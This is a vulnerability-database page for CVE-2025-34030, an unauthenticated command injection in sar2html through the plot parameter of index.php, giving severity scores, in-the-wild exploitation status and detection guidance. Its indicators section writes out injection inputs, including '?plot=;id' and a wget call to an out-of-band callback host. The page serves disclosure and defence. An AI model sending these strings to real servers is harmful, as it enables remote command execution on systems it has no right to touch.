cbcvebase.
CVE-2025-34030
published 2025-06-20

CVE-2025-34030: An OS command injection vulnerability exists in sar2html version 3.2.2 and prior via the plot parameter in index.php. The application fails to sanitize…

PriorityP192critical10CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCHSIHSAHEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
59.07%
99.0th percentile
An OS command injection vulnerability exists in sar2html version 3.2.2 and prior via the plot parameter in index.php. The application fails to sanitize user-supplied input before using it in a system-level context. Remote, unauthenticated attackers can inject shell commands by appending them to the plot parameter (e.g., ?plot=;id) in a crafted GET request. The output of the command is displayed in the application's interface after interacting with the host selection UI. Successful exploitation leads to arbitrary command execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-04 UTC.

Affected

1 ranges
VendorProductVersion rangeFixed in
sar2htmlsar2html<= 3.2.2

Detection & IOCsextracted from sources · hover to see the quote

url/index.php?plot=;wget%20http://{{interactsh-url}}
path/index.php
command?plot=;id
  • Detect OS command injection attempts via the 'plot' parameter in GET requests to index.php; look for shell metacharacters (e.g., semicolons) appended to the parameter value.
  • Match HTTP responses containing both 'sar2html Ver' and 'Select Host' strings to confirm a vulnerable sar2html instance was successfully reached.
  • Monitor for outbound HTTP/DNS callback requests (OAST/interactsh) originating from the web server process following requests to index.php with a semicolon-prefixed plot parameter, indicating successful RCE.
  • Active exploitation in the wild was observed by the Shadowserver Foundation on 2025-02-04 UTC; treat any matching traffic from that date onward as high-confidence compromise.
  • ·The vulnerability is exploitable by unauthenticated, remote attackers — no credentials or prior access are required, maximising exposure on any internet-facing sar2html deployment.
  • ·Command output is only rendered in the UI after interacting with the host selection element, so passive log-only monitoring of HTTP responses may miss successful exploitation.
  • ·Affected versions are 3.2.2 and prior; detections should target all instances of sar2html at or below this version.

CVSS provenance

nvdv4.010.0CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.